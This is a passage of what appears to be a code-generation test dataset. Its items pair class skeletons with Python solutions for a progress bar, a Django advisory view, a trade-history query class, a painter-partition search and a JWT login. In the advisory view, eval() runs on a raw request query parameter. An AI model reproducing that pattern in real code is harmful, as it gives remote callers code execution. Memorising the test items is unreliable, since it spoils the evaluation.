'.' * (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{self.param.current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if self.param.current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / self.param.current * (self.param.target - self.param.current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif self.param.current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n\n def update(self, current, values=None):\n \"\"\"Args: current: update Index of current step. values: List of tuples: (name, value_for_last_step).\"\"\"\n if not self.param.verbose:\n return 0\n self.param.n += 1\n if self.param.target is not None:\n if current > self.param.target:\n raise\n rate = current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' * (self.param.width - percent))[:self.param.width]}] \"\n else:\n msg = f'{current}/Unknown '\n time_diff = time.time() - self.param.time\n if self.param.target is not None:\n if current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / current * (self.param.target - current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\n if values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\n if self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n elif current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\n else:\n self.param.logger.info(msg + ' ' * 4, enter=True)\n", "source": "the_stack_v2_python_sparse", "source_path": "linora/utils/_progbar.py", "source_repo": "Hourout/linora", "split": "test", "star_events_count": 11} {"blob_id": "ad3e822a848fb09cb289c5f4a5df3359ac7a962e", "bodies": ["if self.request.method == 'GET':\n return (IsInPubliclyVisibleCommunity(),)\nelif self.request.method in ('POST', 'DELETE'):\n return (permissions.IsAuthenticated(), IsAbleToCreateAndDeleteAdvisory())\nreturn tuple()", "queryset = self.get_queryset()\nqueryset = filter_queryset_permission(queryset, request, self.get_permissions())\nqueryset = filter_queryset(queryset, request, target_param='advisor', is_foreign_key=True)\nqueryset = filter_queryset(queryset, request, target_param='community', is_foreign_key=True)\ntry:\n query = request.query_params.get('is_active')\n if query is not None:\n query = eval(query)\n active_ids = [i.id for i in queryset if i.start_date <= datetime.now().date() <= i.end_date]\n if query:\n queryset = queryset.filter(pk__in=active_ids)\n else:\n queryset = queryset.exclude(pk__in=active_ids)\nexcept ValueError:\n queryset = None\nqueryset = limit_queryset(queryset, request)\nserializer = self.get_serializer(queryset, many=True)\nreturn Response(serializer.data)"], "bodies_text": "<|body_start_0|>\n if self.request.method == 'GET':\n return (IsInPubliclyVisibleCommunity(),)\n elif self.request.method in ('POST', 'DELETE'):\n return (permissions.IsAuthenticated(), IsAbleToCreateAndDeleteAdvisory())\n return tuple()\n<|end_body_0|>\n\n<|body_start_1|>\n queryset = self.get_queryset()\n queryset = filter_queryset_permission(queryset, request, self.get_permissions())\n queryset = filter_queryset(queryset, request, target_param='advisor', is_foreign_key=True)\n queryset = filter_queryset(queryset, request, target_param='community', is_foreign_key=True)\n try:\n query = request.query_params.get('is_active')\n if query is not None:\n query = eval(query)\n active_ids = [i.id for i in queryset if i.start_date <= datetime.now().date() <= i.end_date]\n if query:\n queryset = queryset.filter(pk__in=active_ids)\n else:\n queryset = queryset.exclude(pk__in=active_ids)\n except ValueError:\n queryset = None\n queryset = limit_queryset(queryset, request)\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n<|end_body_1|>\n", "class_docstring": "Advisory view set", "class_name": "AdvisoryViewSet", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AdvisoryViewSet:\n \"\"\"Advisory view set\"\"\"\n\n def get_permissions(self):\n \"\"\"Get permissions\"\"\"\n <|body_0|>\n\n def list(self, request, *args, **kwargs):\n \"\"\"List advisories\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.request.method == 'GET':\n return (IsInPubliclyVisibleCommunity(),)\n elif self.request.method in ('POST', 'DELETE'):\n return (permissions.IsAuthenticated(), IsAbleToCreateAndDeleteAdvisory())\n return tuple()\n<|end_body_0|>\n\n<|body_start_1|>\n queryset = self.get_queryset()\n queryset = filter_queryset_permission(queryset, request, self.get_permissions())\n queryset = filter_queryset(queryset, request, target_param='advisor', is_foreign_key=True)\n queryset = filter_queryset(queryset, request, target_param='community', is_foreign_key=True)\n try:\n query = request.query_params.get('is_active')\n if query is not None:\n query = eval(query)\n active_ids = [i.id for i in queryset if i.start_date <= datetime.now().date() <= i.end_date]\n if query:\n queryset = queryset.filter(pk__in=active_ids)\n else:\n queryset = queryset.exclude(pk__in=active_ids)\n except ValueError:\n queryset = None\n queryset = limit_queryset(queryset, request)\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000367", "length_bytes": 27778, "license_type": "permissive", "methods": [{"docstring": "Get permissions", "name": "get_permissions", "signature": "def get_permissions(self)"}, {"docstring": "List advisories", "name": "list", "signature": "def list(self, request, *args, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005598", "prompt": "Implement the Python class `AdvisoryViewSet` described below.\n\nClass description:\nAdvisory view set\n\nMethod signatures and docstrings:\n- def get_permissions(self): Get permissions\n- def list(self, request, *args, **kwargs): List advisories", "prompted_full_text": "Implement the Python class `AdvisoryViewSet` described below.\n\nClass description:\nAdvisory view set\n\nMethod signatures and docstrings:\n- def get_permissions(self): Get permissions\n- def list(self, request, *args, **kwargs): List advisories\n\n<|skeleton|>\nclass AdvisoryViewSet:\n \"\"\"Advisory view set\"\"\"\n\n def get_permissions(self):\n \"\"\"Get permissions\"\"\"\n <|body_0|>\n\n def list(self, request, *args, **kwargs):\n \"\"\"List advisories\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.request.method == 'GET':\n return (IsInPubliclyVisibleCommunity(),)\n elif self.request.method in ('POST', 'DELETE'):\n return (permissions.IsAuthenticated(), IsAbleToCreateAndDeleteAdvisory())\n return tuple()\n<|end_body_0|>\n\n<|body_start_1|>\n queryset = self.get_queryset()\n queryset = filter_queryset_permission(queryset, request, self.get_permissions())\n queryset = filter_queryset(queryset, request, target_param='advisor', is_foreign_key=True)\n queryset = filter_queryset(queryset, request, target_param='community', is_foreign_key=True)\n try:\n query = request.query_params.get('is_active')\n if query is not None:\n query = eval(query)\n active_ids = [i.id for i in queryset if i.start_date <= datetime.now().date() <= i.end_date]\n if query:\n queryset = queryset.filter(pk__in=active_ids)\n else:\n queryset = queryset.exclude(pk__in=active_ids)\n except ValueError:\n queryset = None\n queryset = limit_queryset(queryset, request)\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n<|end_body_1|>\n", "revision_id": "cf429f43251ad7e77c0d9bc9fe91bb030ca8bae8", "skeleton": "<|skeleton|>\nclass AdvisoryViewSet:\n \"\"\"Advisory view set\"\"\"\n\n def get_permissions(self):\n \"\"\"Get permissions\"\"\"\n <|body_0|>\n\n def list(self, request, *args, **kwargs):\n \"\"\"List advisories\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AdvisoryViewSet:\n \"\"\"Advisory view set\"\"\"\n\n def get_permissions(self):\n \"\"\"Get permissions\"\"\"\n if self.request.method == 'GET':\n return (IsInPubliclyVisibleCommunity(),)\n elif self.request.method in ('POST', 'DELETE'):\n return (permissions.IsAuthenticated(), IsAbleToCreateAndDeleteAdvisory())\n return tuple()\n\n def list(self, request, *args, **kwargs):\n \"\"\"List advisories\"\"\"\n queryset = self.get_queryset()\n queryset = filter_queryset_permission(queryset, request, self.get_permissions())\n queryset = filter_queryset(queryset, request, target_param='advisor', is_foreign_key=True)\n queryset = filter_queryset(queryset, request, target_param='community', is_foreign_key=True)\n try:\n query = request.query_params.get('is_active')\n if query is not None:\n query = eval(query)\n active_ids = [i.id for i in queryset if i.start_date <= datetime.now().date() <= i.end_date]\n if query:\n queryset = queryset.filter(pk__in=active_ids)\n else:\n queryset = queryset.exclude(pk__in=active_ids)\n except ValueError:\n queryset = None\n queryset = limit_queryset(queryset, request)\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n", "source": "the_stack_v2_python_sparse", "source_path": "membership/views.py", "source_repo": "810Teams/clubs-and-events-backend", "split": "test", "star_events_count": 3} {"blob_id": "df5d2e0541397e5c8c6863ced056aa9a5711873f", "bodies": ["query = self.session.query(VTradehistory.o_time, VTradehistory.o_deal, VTradehistory.login, VTradehistory.symbol, VTradehistory.o_action, VTradehistory.volume, VTradehistory.o_price, VTradehistory.o_commission, VTradehistory.positionid, VTradehistory.c_time, VTradehistory.c_deal, VTradehistory.volumeclosed, VTradehistory.c_price, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\nif start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\nif end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\nif mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\nif page == -1:\n return query.all()\nif not page or page == '' or page == 'undefined':\n page = 1\nreturn Pagination(query=query, page=page)", "query = self.session.query(VTradehistory.o_time, VTradehistory.login, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\nif start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\nif end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\nif mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\nsum_list = []\nprofit_sum = 0\nstorage_sum = 0\nc_commission_sum = 0\nprofitraw_sum = 0\nfor obj in query:\n profit_sum = profit_sum + obj.profit\n storage_sum = storage_sum + obj.storage\n c_commission_sum = c_commission_sum + obj.c_commission\n profitraw_sum = profitraw_sum + obj.profitraw\nsum_list.append({'profit_sum': str(profit_sum), 'storage_sum': str(storage_sum), 'c_commission_sum': str(c_commission_sum), 'profitraw_sum': str(profitraw_sum)})\nreturn sum_list"], "bodies_text": "<|body_start_0|>\n query = self.session.query(VTradehistory.o_time, VTradehistory.o_deal, VTradehistory.login, VTradehistory.symbol, VTradehistory.o_action, VTradehistory.volume, VTradehistory.o_price, VTradehistory.o_commission, VTradehistory.positionid, VTradehistory.c_time, VTradehistory.c_deal, VTradehistory.volumeclosed, VTradehistory.c_price, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n if page == -1:\n return query.all()\n if not page or page == '' or page == 'undefined':\n page = 1\n return Pagination(query=query, page=page)\n<|end_body_0|>\n\n<|body_start_1|>\n query = self.session.query(VTradehistory.o_time, VTradehistory.login, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n sum_list = []\n profit_sum = 0\n storage_sum = 0\n c_commission_sum = 0\n profitraw_sum = 0\n for obj in query:\n profit_sum = profit_sum + obj.profit\n storage_sum = storage_sum + obj.storage\n c_commission_sum = c_commission_sum + obj.c_commission\n profitraw_sum = profitraw_sum + obj.profitraw\n sum_list.append({'profit_sum': str(profit_sum), 'storage_sum': str(storage_sum), 'c_commission_sum': str(c_commission_sum), 'profitraw_sum': str(profitraw_sum)})\n return sum_list\n<|end_body_1|>\n", "class_docstring": "v_tradehistory视图操作", "class_name": "VTradehistoryDao", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass VTradehistoryDao:\n \"\"\"v_tradehistory视图操作\"\"\"\n\n def search_by_uid(self, uid, start, end, mtlogin, page=None):\n \"\"\"已知用户id,根据时间段,查询交易订单 :param uid:用户id :param start:起始时间 :param end:结束时间 :param page:请求页 :return:queryset\"\"\"\n <|body_0|>\n\n def searchsum_by_uid(self, uid, start, end, mtlogin):\n \"\"\"已知用户id,根据时间段,查询总和 :param uid: 用户id :param start: 开始时间 :param end: 结束时间 :return: 各项总和\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n query = self.session.query(VTradehistory.o_time, VTradehistory.o_deal, VTradehistory.login, VTradehistory.symbol, VTradehistory.o_action, VTradehistory.volume, VTradehistory.o_price, VTradehistory.o_commission, VTradehistory.positionid, VTradehistory.c_time, VTradehistory.c_deal, VTradehistory.volumeclosed, VTradehistory.c_price, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n if page == -1:\n return query.all()\n if not page or page == '' or page == 'undefined':\n page = 1\n return Pagination(query=query, page=page)\n<|end_body_0|>\n\n<|body_start_1|>\n query = self.session.query(VTradehistory.o_time, VTradehistory.login, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n sum_list = []\n profit_sum = 0\n storage_sum = 0\n c_commission_sum = 0\n profitraw_sum = 0\n for obj in query:\n profit_sum = profit_sum + obj.profit\n storage_sum = storage_sum + obj.storage\n c_commission_sum = c_commission_sum + obj.c_commission\n profitraw_sum = profitraw_sum + obj.profitraw\n sum_list.append({'profit_sum': str(profit_sum), 'storage_sum': str(storage_sum), 'c_commission_sum': str(c_commission_sum), 'profitraw_sum': str(profitraw_sum)})\n return sum_list\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000368", "length_bytes": 26694, "license_type": "permissive", "methods": [{"docstring": "已知用户id,根据时间段,查询交易订单 :param uid:用户id :param start:起始时间 :param end:结束时间 :param page:请求页 :return:queryset", "name": "search_by_uid", "signature": "def search_by_uid(self, uid, start, end, mtlogin, page=None)"}, {"docstring": "已知用户id,根据时间段,查询总和 :param uid: 用户id :param start: 开始时间 :param end: 结束时间 :return: 各项总和", "name": "searchsum_by_uid", "signature": "def searchsum_by_uid(self, uid, start, end, mtlogin)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003509", "prompt": "Implement the Python class `VTradehistoryDao` described below.\n\nClass description:\nv_tradehistory视图操作\n\nMethod signatures and docstrings:\n- def search_by_uid(self, uid, start, end, mtlogin, page=None): 已知用户id,根据时间段,查询交易订单 :param uid:用户id :param start:起始时间 :param end:结束时间 :param page:请求页 :return:queryset\n- def searchsum_by_uid(self, uid, start, end, mtlogin): 已知用户id,根据时间段,查询总和 :param uid: 用户id :param start: 开始时间 :param end: 结束时间 :return: 各项总和", "prompted_full_text": "Implement the Python class `VTradehistoryDao` described below.\n\nClass description:\nv_tradehistory视图操作\n\nMethod signatures and docstrings:\n- def search_by_uid(self, uid, start, end, mtlogin, page=None): 已知用户id,根据时间段,查询交易订单 :param uid:用户id :param start:起始时间 :param end:结束时间 :param page:请求页 :return:queryset\n- def searchsum_by_uid(self, uid, start, end, mtlogin): 已知用户id,根据时间段,查询总和 :param uid: 用户id :param start: 开始时间 :param end: 结束时间 :return: 各项总和\n\n<|skeleton|>\nclass VTradehistoryDao:\n \"\"\"v_tradehistory视图操作\"\"\"\n\n def search_by_uid(self, uid, start, end, mtlogin, page=None):\n \"\"\"已知用户id,根据时间段,查询交易订单 :param uid:用户id :param start:起始时间 :param end:结束时间 :param page:请求页 :return:queryset\"\"\"\n <|body_0|>\n\n def searchsum_by_uid(self, uid, start, end, mtlogin):\n \"\"\"已知用户id,根据时间段,查询总和 :param uid: 用户id :param start: 开始时间 :param end: 结束时间 :return: 各项总和\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n query = self.session.query(VTradehistory.o_time, VTradehistory.o_deal, VTradehistory.login, VTradehistory.symbol, VTradehistory.o_action, VTradehistory.volume, VTradehistory.o_price, VTradehistory.o_commission, VTradehistory.positionid, VTradehistory.c_time, VTradehistory.c_deal, VTradehistory.volumeclosed, VTradehistory.c_price, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n if page == -1:\n return query.all()\n if not page or page == '' or page == 'undefined':\n page = 1\n return Pagination(query=query, page=page)\n<|end_body_0|>\n\n<|body_start_1|>\n query = self.session.query(VTradehistory.o_time, VTradehistory.login, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n sum_list = []\n profit_sum = 0\n storage_sum = 0\n c_commission_sum = 0\n profitraw_sum = 0\n for obj in query:\n profit_sum = profit_sum + obj.profit\n storage_sum = storage_sum + obj.storage\n c_commission_sum = c_commission_sum + obj.c_commission\n profitraw_sum = profitraw_sum + obj.profitraw\n sum_list.append({'profit_sum': str(profit_sum), 'storage_sum': str(storage_sum), 'c_commission_sum': str(c_commission_sum), 'profitraw_sum': str(profitraw_sum)})\n return sum_list\n<|end_body_1|>\n", "revision_id": "1fadeecf31f1d25e258dc5d70c47a785f7b33961", "skeleton": "<|skeleton|>\nclass VTradehistoryDao:\n \"\"\"v_tradehistory视图操作\"\"\"\n\n def search_by_uid(self, uid, start, end, mtlogin, page=None):\n \"\"\"已知用户id,根据时间段,查询交易订单 :param uid:用户id :param start:起始时间 :param end:结束时间 :param page:请求页 :return:queryset\"\"\"\n <|body_0|>\n\n def searchsum_by_uid(self, uid, start, end, mtlogin):\n \"\"\"已知用户id,根据时间段,查询总和 :param uid: 用户id :param start: 开始时间 :param end: 结束时间 :return: 各项总和\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class VTradehistoryDao:\n \"\"\"v_tradehistory视图操作\"\"\"\n\n def search_by_uid(self, uid, start, end, mtlogin, page=None):\n \"\"\"已知用户id,根据时间段,查询交易订单 :param uid:用户id :param start:起始时间 :param end:结束时间 :param page:请求页 :return:queryset\"\"\"\n query = self.session.query(VTradehistory.o_time, VTradehistory.o_deal, VTradehistory.login, VTradehistory.symbol, VTradehistory.o_action, VTradehistory.volume, VTradehistory.o_price, VTradehistory.o_commission, VTradehistory.positionid, VTradehistory.c_time, VTradehistory.c_deal, VTradehistory.volumeclosed, VTradehistory.c_price, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n if page == -1:\n return query.all()\n if not page or page == '' or page == 'undefined':\n page = 1\n return Pagination(query=query, page=page)\n\n def searchsum_by_uid(self, uid, start, end, mtlogin):\n \"\"\"已知用户id,根据时间段,查询总和 :param uid: 用户id :param start: 开始时间 :param end: 结束时间 :return: 各项总和\"\"\"\n query = self.session.query(VTradehistory.o_time, VTradehistory.login, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n sum_list = []\n profit_sum = 0\n storage_sum = 0\n c_commission_sum = 0\n profitraw_sum = 0\n for obj in query:\n profit_sum = profit_sum + obj.profit\n storage_sum = storage_sum + obj.storage\n c_commission_sum = c_commission_sum + obj.c_commission\n profitraw_sum = profitraw_sum + obj.profitraw\n sum_list.append({'profit_sum': str(profit_sum), 'storage_sum': str(storage_sum), 'c_commission_sum': str(c_commission_sum), 'profitraw_sum': str(profitraw_sum)})\n return sum_list\n", "source": "the_stack_v2_python_sparse", "source_path": "xwcrm/model/views.py", "source_repo": "MSUNorg/XWCRM", "split": "test", "star_events_count": 0} {"blob_id": "ec4e5c5999395d3c5f1cc232113ab435b89bb07a", "bodies": ["total = 0\npainters = 1\nfor length in array:\n total += length\n if total > max_length:\n painters += 1\n total = length\nreturn painters", "low = max(array)\nhigh = sum(array)\nwhile low < high:\n mid = (low + high) // 2\n painters = self.count_painters(array, mid)\n if painters <= k:\n high = mid\n else:\n low = mid + 1\nm = 10000003\nreturn low % m * (t % m) % m"], "bodies_text": "<|body_start_0|>\n total = 0\n painters = 1\n for length in array:\n total += length\n if total > max_length:\n painters += 1\n total = length\n return painters\n<|end_body_0|>\n\n<|body_start_1|>\n low = max(array)\n high = sum(array)\n while low < high:\n mid = (low + high) // 2\n painters = self.count_painters(array, mid)\n if painters <= k:\n high = mid\n else:\n low = mid + 1\n m = 10000003\n return low % m * (t % m) % m\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def count_painters(self, array, max_length):\n \"\"\"Returns total number of painters, that we're gonna need if we use max_length as maximum boards' length that each painter is gonna paint. Time complexity: O(n). Space complexity: O(1), n is len(array).\"\"\"\n <|body_0|>\n\n def paint(self, k, t, array):\n \"\"\"Returns minimum time required to paint all the boards. Time complexity: O(n * lg(sum(array))). Space complexity: O(1), n is len(array).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n total = 0\n painters = 1\n for length in array:\n total += length\n if total > max_length:\n painters += 1\n total = length\n return painters\n<|end_body_0|>\n\n<|body_start_1|>\n low = max(array)\n high = sum(array)\n while low < high:\n mid = (low + high) // 2\n painters = self.count_painters(array, mid)\n if painters <= k:\n high = mid\n else:\n low = mid + 1\n m = 10000003\n return low % m * (t % m) % m\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000369", "length_bytes": 1522, "license_type": "no_license", "methods": [{"docstring": "Returns total number of painters, that we're gonna need if we use max_length as maximum boards' length that each painter is gonna paint. Time complexity: O(n). Space complexity: O(1), n is len(array).", "name": "count_painters", "signature": "def count_painters(self, array, max_length)"}, {"docstring": "Returns minimum time required to paint all the boards. Time complexity: O(n * lg(sum(array))). Space complexity: O(1), n is len(array).", "name": "paint", "signature": "def paint(self, k, t, array)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002953", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def count_painters(self, array, max_length): Returns total number of painters, that we're gonna need if we use max_length as maximum boards' length that each painter is gonna paint. Time complexity: O(n). Space complexity: O(1), n is len(array).\n- def paint(self, k, t, array): Returns minimum time required to paint all the boards. Time complexity: O(n * lg(sum(array))). Space complexity: O(1), n is len(array).", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def count_painters(self, array, max_length): Returns total number of painters, that we're gonna need if we use max_length as maximum boards' length that each painter is gonna paint. Time complexity: O(n). Space complexity: O(1), n is len(array).\n- def paint(self, k, t, array): Returns minimum time required to paint all the boards. Time complexity: O(n * lg(sum(array))). Space complexity: O(1), n is len(array).\n\n<|skeleton|>\nclass Solution:\n\n def count_painters(self, array, max_length):\n \"\"\"Returns total number of painters, that we're gonna need if we use max_length as maximum boards' length that each painter is gonna paint. Time complexity: O(n). Space complexity: O(1), n is len(array).\"\"\"\n <|body_0|>\n\n def paint(self, k, t, array):\n \"\"\"Returns minimum time required to paint all the boards. Time complexity: O(n * lg(sum(array))). Space complexity: O(1), n is len(array).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n total = 0\n painters = 1\n for length in array:\n total += length\n if total > max_length:\n painters += 1\n total = length\n return painters\n<|end_body_0|>\n\n<|body_start_1|>\n low = max(array)\n high = sum(array)\n while low < high:\n mid = (low + high) // 2\n painters = self.count_painters(array, mid)\n if painters <= k:\n high = mid\n else:\n low = mid + 1\n m = 10000003\n return low % m * (t % m) % m\n<|end_body_1|>\n", "revision_id": "71b722ddfe8da04572e527b055cf8723d5c87bbf", "skeleton": "<|skeleton|>\nclass Solution:\n\n def count_painters(self, array, max_length):\n \"\"\"Returns total number of painters, that we're gonna need if we use max_length as maximum boards' length that each painter is gonna paint. Time complexity: O(n). Space complexity: O(1), n is len(array).\"\"\"\n <|body_0|>\n\n def paint(self, k, t, array):\n \"\"\"Returns minimum time required to paint all the boards. Time complexity: O(n * lg(sum(array))). Space complexity: O(1), n is len(array).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def count_painters(self, array, max_length):\n \"\"\"Returns total number of painters, that we're gonna need if we use max_length as maximum boards' length that each painter is gonna paint. Time complexity: O(n). Space complexity: O(1), n is len(array).\"\"\"\n total = 0\n painters = 1\n for length in array:\n total += length\n if total > max_length:\n painters += 1\n total = length\n return painters\n\n def paint(self, k, t, array):\n \"\"\"Returns minimum time required to paint all the boards. Time complexity: O(n * lg(sum(array))). Space complexity: O(1), n is len(array).\"\"\"\n low = max(array)\n high = sum(array)\n while low < high:\n mid = (low + high) // 2\n painters = self.count_painters(array, mid)\n if painters <= k:\n high = mid\n else:\n low = mid + 1\n m = 10000003\n return low % m * (t % m) % m\n", "source": "the_stack_v2_python_sparse", "source_path": "Binary_Search/painter_partition.py", "source_repo": "vladn90/Algorithms", "split": "test", "star_events_count": 0} {"blob_id": "27881459c062757b34a543afb193c0f47cb0dc66", "bodies": ["user = g.login_user\nbuckets_count, files_count, files_size, files_types = user_space_count(user)\nuser.buckets_count = buckets_count\nuser.files_count = files_count\nuser.files_size = files_size\nuser.files_types = files_types\nreturn success_response(data=user)", "body_data = request.get_json()\nuser = db.session.query(User).filter(or_(User.email == body_data['username'], User.username == body_data['username'])).first()\nif user is None:\n raise ProfileError(code=404, message={'username': \"No enable user's username or email is {0}!\".format(body_data['username'])})\nif not user.check_password(body_data['password']):\n raise ProfileError(code=400, message={'password': 'Your password is wrong!'})\nexpire_time = datetime.now() + timedelta(minutes=30)\ntoken = jwt.encode({'user_id': user.id, 'expire': expire_time.timestamp()}, key=current_app.config['SECRET_KEY'])\nuser.last_login_time = datetime.now()\nuser.last_login_ip = request.remote_addr\ndb.session.commit()\nreturn success_response(data={'token': token.decode('UTF-8')})"], "bodies_text": "<|body_start_0|>\n user = g.login_user\n buckets_count, files_count, files_size, files_types = user_space_count(user)\n user.buckets_count = buckets_count\n user.files_count = files_count\n user.files_size = files_size\n user.files_types = files_types\n return success_response(data=user)\n<|end_body_0|>\n\n<|body_start_1|>\n body_data = request.get_json()\n user = db.session.query(User).filter(or_(User.email == body_data['username'], User.username == body_data['username'])).first()\n if user is None:\n raise ProfileError(code=404, message={'username': \"No enable user's username or email is {0}!\".format(body_data['username'])})\n if not user.check_password(body_data['password']):\n raise ProfileError(code=400, message={'password': 'Your password is wrong!'})\n expire_time = datetime.now() + timedelta(minutes=30)\n token = jwt.encode({'user_id': user.id, 'expire': expire_time.timestamp()}, key=current_app.config['SECRET_KEY'])\n user.last_login_time = datetime.now()\n user.last_login_ip = request.remote_addr\n db.session.commit()\n return success_response(data={'token': 